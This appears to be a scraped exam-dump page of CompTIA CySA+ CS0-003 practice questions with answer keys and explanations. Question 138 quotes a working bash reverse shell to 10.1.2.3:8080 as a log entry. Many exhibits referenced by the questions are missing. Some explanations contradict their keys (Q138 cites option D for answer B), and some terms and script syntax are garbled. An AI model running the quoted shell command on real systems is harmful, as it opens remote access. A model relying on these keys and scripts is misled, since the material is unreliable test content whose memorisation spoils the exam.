[2024年更新]合格できるCS0-003試験にはリアルな問題解答
CS0-003試験問題ゲット最新[2024]と正解回答
質問 # 123
A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:
Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?
- A. ENameless:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: No
Channing: No - B. InLoud:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: Yes
Channing: No - C. TSpirit:
Cobain: Yes
Grohl: Yes
Novo: Yes
Smear: No
Channing: No - D. PBleach:
Cobain: Yes
Grohl: No
Novo: No
Smear: No
Channing: Yes
正解:C
解説:
The vulnerability that should be patched first, given the above third-party scoring system, is:
TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No This vulnerability has three out of five metrics marked as Yes, which indicates a high severity level. The metrics Cobain, Grohl, and Novo are more important than Smear and Channing, according to the vulnerability management team. Therefore, this vulnerability poses a greater risk than the other vulnerabilities and should be patched first.
質問 # 124
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
- A. Unsupported operating systems
- B. Proprietary systems
- C. Legacy systems
- D. Lack of maintenance windows
正解:B
解説:
Proprietary systems are systems that are owned and controlled by a specific vendor or manufacturer, and that use proprietary standards or protocols that are not compatible with other systems. Proprietary systems can pose a challenge for vulnerability management, as they may not allow users to access or modify their configuration, update their software, or patch their vulnerabilities. In this case, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. This indicates that these systems and associated vulnerabilities are examples of proprietary systems as inhibitors to remediation
質問 # 125
A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:
Which of the following vulnerabilities should be prioritized for remediation?
- A. vote.4p
- B. sweet.bike
- C. nessie.explosion
- D. great.skills
正解:C
解説:
nessie.explosion should be prioritized for remediation, as it has the highest CVSSv3.1 exploitability score of
8.6. The exploitability score is a sub-score of the CVSSv3.1 base score, which reflects the ease and technical means by which the vulnerability can be exploited. The exploitability score is calculated based on four metrics: Attack Vector, Attack Complexity, Privileges Required, and User Interaction. The higher the exploitability score, the more likely and feasible the vulnerability is to be exploited by an attacker12.
nessie.explosion has the highest exploitability score because it has the lowest values for all four metrics:
Network (AV:N), Low (AC:L), None (PR:N), and None (UI:N). This means that the vulnerability can be exploited remotely over the network, without requiring any user interaction or privileges, and with low complexity. Therefore, nessie.explosion poses the greatest threat to the end user workstations, and should be remediated first. vote.4p, sweet.bike, and great.skills have lower exploitability scores because they have higher values for some of the metrics, such as Adjacent Network (AV:A), High (AC:H), Low (PR:L), or Required (UI:R). This means that the vulnerabilities are more difficult or less likely to be exploited, as they require physical proximity, user involvement, or some privileges34. References: CVSS v3.1 Specification Document - FIRST, NVD - CVSS v3 Calculator, CVSS v3.1 User Guide - FIRST, CVSS v3.1 Examples - FIRST
質問 # 126
A security audit for unsecured network services was conducted, and the following output was generated:
Which of the following services should the security team investigate further? (Select two).
- A. 0
- B. 1
- C. 2
- D. 3
- E. 4
- F. 5
正解:C、F
解説:
The output shows the results of a port scan, which is a technique used to identify open ports and services running on a network host. Port scanning can be used by attackers to discover potential vulnerabilities and exploit them, or by defenders to assess the security posture and configuration of their network devices1 The output lists six ports that are open on the target host, along with the service name and version associated with each port. The service name indicates the type of application or protocol that is using the port, while the version indicates the specific release or update of the service. The service name and version can provide useful information for both attackers and defenders, as they can reveal the capabilities, features, and weaknesses of the service.
Among the six ports listed, two are particularly risky and should be investigated further by the security team:
port 23 and port 636.
Port 23 is used by Telnet, which is an old and insecure protocol for remote login and command execution.
Telnet does not encrypt any data transmitted over the network, including usernames and passwords, which makes it vulnerable to eavesdropping, interception, and modification by attackers. Telnet also has many known vulnerabilities that can allow attackers to gain unauthorized access, execute arbitrary commands, or cause denial-of-service attacks on the target host23 Port 636 is used by LDAP over SSL/TLS (LDAPS), which is a protocol for accessing and modifying directory services over a secure connection. LDAPS encrypts the data exchanged between the client and the server using SSL/TLS certificates, which provide authentication, confidentiality, and integrity. However, LDAPS can also be vulnerable to attacks if the certificates are not properly configured, verified, or updated. For example, attackers can use self-signed or expired certificates to perform man-in-the-middle attacks, spoofing attacks, or certificate revocation attacks on LDAPS connections.
Therefore, the security team should investigate further why port 23 and port 636 are open on the target host, and what services are running on them. The security team should also consider disabling or replacing these services with more secure alternatives, such as SSH for port 23 and StartTLS for port 6362
質問 # 127
A security analyst needs to mitigate a known, exploited vulnerability related not tack vector that embeds software through the USB interface. Which of the following should the analyst do first?
- A. Check configurations to determine whether USB ports are enabled on company assets.
- B. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
- C. Review logs to see whether this exploitable vulnerability has already impacted the company.
- D. Write a removable media policy that explains that USBs cannot be connected to a company asset.
正解:A
解説:
USB ports are a common attack vector that can be used to deliver malware, steal data, or compromise systems. The first step to mitigate this vulnerability is to check the configurations of the company assets and disable or restrict the USB ports if possible. This will prevent unauthorized devices from being connected and reduce the attack surface. The other options are also important, but they are not the first priority in this scenario.
Reference:
CompTIA CySA+ CS0-003 Certification Study Guide, page 247
What are Attack Vectors: Definition & Vulnerabilities, section "How to secure attack vectors" Are there any attack vectors for a printer connected through USB in a Windows environment?, answer by user "schroeder"
質問 # 128
A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:
Which of the following scripting languages was used in the script?
- A. Python
- B. PowerShel
- C. Shell script
- D. Ruby
正解:B
解説:
The script uses PowerShell syntax, such as cmdlets, parameters, variables, and comments. PowerShell is a scripting language that can be used to automate tasks and manage systems.
質問 # 129
The following output is from a tcpdump al the edge of the corporate network:
Which of the following best describes the potential security concern?
- A. Payload lengths may be used to overflow buffers enabling code execution.
- B. The content of the traffic payload may permit VLAN hopping.
- C. This traffic exhibits a reconnaissance technique to create network footprints.
- D. Encapsulated traffic may evade security monitoring and defenses
正解:D
解説:
Encapsulated traffic may evade security monitoring and defenses by hiding or obfuscating the actual content or source of the traffic. Encapsulation is a technique that wraps data packets with additional headers or protocols to enable communication across different network types or layers. Encapsulation can be used for legitimate purposes, such as tunneling, VPNs, or NAT, but it can also be used by attackers to bypass security controls or detection mechanisms that are not able to inspect or analyze the encapsulated traffic .
質問 # 130
Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
- A. Determine if an internal mistake was made and who did it so they do not repeat the error
- B. Present all legal evidence collected and turn it over to iaw enforcement
- C. Identify any improvements or changes in the incident response plan or procedures
- D. Discuss the financial impact of the incident to determine if security controls are well spent
正解:C
解説:
Explanation
An important aspect that should be included in the lessons-learned step after an incident is to identify any improvements or changes in the incident response plan or procedures. The lessons-learned step is a process that involves reviewing and evaluating the incident response activities and outcomes, as well as identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying any improvements or changes in the incident response plan or procedures can help enhance the security posture, readiness, or capability of the organization for future incidents
質問 # 131
Which of the following does "federation" most likely refer to within the context of identity and access management?
- A. Utilizing a combination of what you know who you are, and what you have to grant authentication to a user
- B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains
- C. Correlating one's identity with the attributes and associated applications the user has access to
- D. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access
正解:B
質問 # 132
Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:
Which of the following choices should the analyst look at first?
- A. p4wnp1_aloa.lan (192.168.86.56)
- B. wh4dc-748gy.lan (192.168.86.152)
- C. imaging.lan (192.168.86.150)
- D. xlaptop.lan (192.168.86.249)
- E. officerckuplayer.lan (192.168.86.22)
正解:A
解説:
The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network. P4wnP1 ALOA is a tool that can be used to create a malicious USB device that can perform various attacks, such as keystroke injection, network sniffing, man-in-the- middle, or backdoor creation. The presence of a device with this name on the network could indicate that an attacker has plugged in a malicious USB device to a system and gained access to the network.
質問 # 133
A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:
Which of the following vulnerabilities is the security analyst trying to validate?
- A. SQL injection
- B. XSS
- C. CSRF
- D. LFI
正解:D
質問 # 134
During an audit, several customer order forms were found to contain inconsistencies between the actual price of an item and the amount charged to the customer. Further investigation narrowed the cause of the issue to manipulation of the public-facing web form used by customers to order products. Which of the following would be the best way to locate this issue?
- A. Reduce the session timeout threshold
- B. Deploy MFA for access to the web server.
- C. Run a dynamic code analysis.
- D. Implement input validation.
正解:D
解説:
Implementing input validation is the best way to locate and prevent the issue of manipulation of the public-facing web form used by customers to order products. Input validation is a technique that checks and filters any user input that is sent to an application before processing it. Input validation can help to ensure that the user input conforms to the expected format, length and type, and does not contain any malicious characters or syntax that may alter the logic or behavior of the application. Input validation can also reject or sanitize any input that does not meet the validation criteria .
質問 # 135
An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
- A. Make a copy of the files as a backup on the server.
- B. Place a legal hold on the device and the user's network share.
- C. Disable the user's network account and access to web resources.
- D. Make a forensic image of the device and create a SHA-1 hash.
正解:D
解説:
Making a forensic image of the device and creating a SRA-I hash is the best step to preserve evidence, as it creates an exact copy of the device's data and verifies its integrity. A forensic image is a bit-by-bit copy of the device's storage media, which preserves all the information on the device, including deleted or hidden files. A SRA-I hash is a cryptographic value that is calculated from the forensic image, which can be used to prove that the image has not been altered or tampered with. The other options are not as effective as making a forensic image and creating a SRA-I hash, as they may not capture all the relevant data, or they may not provide sufficient verification of the evidence's authenticity.
質問 # 136
An organization announces that all employees will need to work remotely for an extended period of time. All employees will be provided with a laptop and supported hardware to facilitate this requirement. The organization asks the information security division to reduce the risk during this time. Which of the following is a technical control that will reduce the risk of data loss if a laptop is lost or stolen?
- A. Requiring the screen to be locked after five minutes of inactivity
- B. Requiring the laptop to be locked in a cabinet when not in use
- C. Requiring full disk encryption
- D. Requiring the use of the corporate VPN
正解:C
解説:
Full disk encryption (FDE) is a technical control that encrypts all the data on a disk drive, including the operating system and applications. FDE prevents unauthorized access to the data if the disk drive is lost or stolen, as it requires a password or key to decrypt the data. FDE can be implemented using software or hardware solutions and can protect data at rest on laptops and other devices. The other options are not technical controls or do not reduce the risk of data loss if a laptop is lost or stolen. Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 10; https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-overview
質問 # 137
During an incident involving phishing, a security analyst needs to find the source of the malicious email.
Which of the following techniques would provide the analyst with this information?
- A. Packet capture
- B. Reverse engineering
- C. Header analysis
- D. SSL inspection
正解:C
解説:
Header analysis is the technique of examining the metadata of an email, such as the sender, recipient, date, subject, and routing information. It can help to identify the source of a malicious email by revealing the IP address and domain name of the originator, as well as any spoofing or redirection attempts. References:
CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 6, page 240; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 6, page 249.
質問 # 138
A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
- A. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" I| echo "OK" - B. #!/bin/bash
netstat -antp Igrep 8080 >dev/null && echo "Malicious activity" I| echo "OK" - C. #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" Il echo "OK" - D. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo "Malicious activity" I| echo "OK"
正解:B
解説:
The suspicious entry on the host-based IDS logs indicates that a reverse shell was executed on the host, which connects to the remote IP address 10.1.2.3 on port 8080. The shell script option D uses the netstat command to check if there is any active connection to that IP address and port, and prints "Malicious activity" if there is, or
"OK" otherwise. This is the most accurate way to confirm if the reverse shell is still active, as the other options may not detect the connection or may produce false positives.
ReferencesCompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 8: Incident Response, page
339.Reverse Shell Cheat Sheet, Bash section.
質問 # 139
A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?
- A. An administrator executed a new database replication process without notifying the SOC
- B. A threat actor has a foothold on the network and is sending out control beacons
- C. An insider threat actor is running Responder on the local segment, creating traffic replication
- D. A local red team member is enumerating the local RFC1918 segment to enumerate hosts
正解:A
質問 # 140
A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
- A. Scanning
- B. Beaconing
- C. Data exfiltration
- D. Rogue device
正解:B
解説:
Beaconing is the best term to describe the activity that is taking place, as it refers to the periodic communication between an infected host and a blocklisted external server. Beaconing is a common technique used by malware to establish a connection with a command-and-control (C2) server, which can provide instructions, updates, or exfiltration capabilities to the malware. Beaconing can vary in frequency, duration, and payload, depending on the type and sophistication of the malware. The other terms are not as accurate as beaconing, as they describe different aspects of malicious activity. Data exfiltration is the unauthorized transfer of data from a compromised system to an external destination, such as a C2 server or a cloud storage service. Data exfiltration can be a goal or a consequence of malware infection, but it does not necessarily involve blocklisted servers or consistent requests. Rogue device is a device that is connected to a network without authorization or proper security controls. Rogue devices can pose a security risk, as they can introduce malware, bypass firewalls, or access sensitive data. However, rogue devices are not necessarily infected with malware or communicating with blocklisted servers. Scanning is the process of probing a network or a system for vulnerabilities, open ports, services, or other information. Scanning can be performed by legitimate administrators or malicious actors, depending on the intent and authorization. Scanning does not imply consistent requests or blocklisted servers, as it can target any network or system.
質問 # 141
Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Select two).
- A. Write blocker
- B. Thumb drive
- C. Tamper-evident seal
- D. Signal-shielded bag
- E. Crime scene tape
- F. Drive duplicator
正解:C、D
解説:
A signal-shielded bag and a tamper-evident seal are tools that can be used to maintain the integrity of the mobile phone while it is transported. A signal-shielded bag prevents the phone from receiving or sending any signals that could compromise the data or evidence on the device. A tamper-evident seal ensures that the phone has not been opened or altered during the transportation. Reference: Mobile device forensics, Section: Acquisition
質問 # 142
Given the following CVSS string:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Which of the following attributes correctly describes this vulnerability?
- A. The vulnerability does not affect confidentiality.
- B. The vulnerability is network based.
- C. The complexity to exploit the vulnerability is high.
- D. A user is required to exploit this vulnerability.
正解:B
解説:
The vulnerability is network based is the correct attribute that describes this vulnerability, as it can be inferred from the CVSS string. CVSS stands for Common Vulnerability Scoring System, which is a framework that assigns numerical scores and ratings to vulnerabilities based on their characteristics and severity. The CVSS string consists of several metrics that define different aspects of the vulnerability, such as the attack vector, the attack complexity, the privileges required, the user interaction, the scope, and the impact on confidentiality, integrity and availability. The first metric in the CVSS string is the attack vector (AV), which indicates how the vulnerability can be exploited. The value of AV in this case is N, which stands for network. This means that the vulnerability can be exploited remotely over a network connection, without physical or logical access to the target system. Therefore, the vulnerability is network based.
質問 # 143
Which of the following stakeholders are most likely to receive a vulnerability scan report?
(Choose two.)
- A. Legal
- B. Product owner
- C. Law enforcement
- D. Executive management
- E. Systems administration
- F. Marketing
正解:B、E
質問 # 144
An organization has the following risk mitigation policies:
- Risks without compensating controls will be mitigated first it the risk value is greater than
$50,000.
- Other risk mitigation will be prioritized based on risk value.
The following risks have been identified:
Which of the following is the order of priority for risk mitigation from highest to lowest?
- A. C. D, A, B
- B. B, C, D, A
- C. C, B, A, D
- D. A, C, D, B
- E. D, C, B, A
正解:C
解説:
C is first because of has no compensanting control and the risk value is greater than $50,000 D is last because of has no compensanting control and the risk value is LESS than $50,000
質問 # 145
......
CompTIA CS0-003 認定試験の出題範囲:
| トピック | 出題範囲 |
|---|---|
| トピック 1 |
|
| トピック 2 |
|
| トピック 3 |
|
| トピック 4 |
|
練習できるCS0-003問題で認証試験問題集ガイド解答は練習専門PassTest:https://www.passtest.jp/CompTIA/CS0-003-shiken.html
無料CompTIA CS0-003テスト練習テスト問題試験問題集:https://drive.google.com/open?id=1Z2w-LEc47xyZn-x99hQymLVuiMFVmH58